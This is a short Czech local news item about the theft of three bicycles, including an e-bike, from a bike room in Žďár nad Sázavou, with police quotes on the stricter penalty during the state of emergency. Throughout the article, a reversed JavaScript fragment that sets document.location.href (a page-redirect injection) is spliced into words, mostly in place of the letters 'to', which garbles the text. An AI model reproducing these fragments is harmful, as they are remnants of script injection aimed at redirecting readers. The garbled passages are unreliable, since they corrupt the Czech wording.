Rainbow page separator

Zloděj vykradl kolárnu, za tři kola mu hrozí osmileté vězení

Čtvrtek, 7. ledna 2021

Žďár nad Sázavou / Tři jízdní kola v celkové hodnotě 75 tisíc korun ukradl dosud neznámý zloděj z kolárny by[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového domu ve žďárské Nádražní ulici. K činu došlo v přesně nezjištěné době od 21. prosince do 2. ledna.
„Zloděj musel překonat kromě jiného dveře do kolárny, odkud odcizil elektrokolo v hodnotě padesát tisíc korun, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že bylo zajištěno zámkem. Ve stejnou dobu a na stejném místě překonal taktéž lankový zámek, kterým bylo zajištěno pánské horské jízdní kolo, které rovněž odcizil, čímž způsobil škodu ve výši patnáct tisíc korun,“ popsala policejní mluvčí Dana Čírtková s tím, že třetím ukradeným bicyklem z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tožné kolárny se stalo dámské trekové kolo v hodnotě deset tisíc.
„Pachatel je podezřelý ze spáchání trestného činu krádeže vloupáním. Vzhledem k [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomu, že se činu dopustil v období, kdy je v České republice vyhlášený nouzový stav, bude právní kvalifikace skutku přísnější, takže v případě zadržení je ohrožen trestní sazbou až osmi let odnětí svobody,“ upřesnila Dana Čírtková.

ilustrační fo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to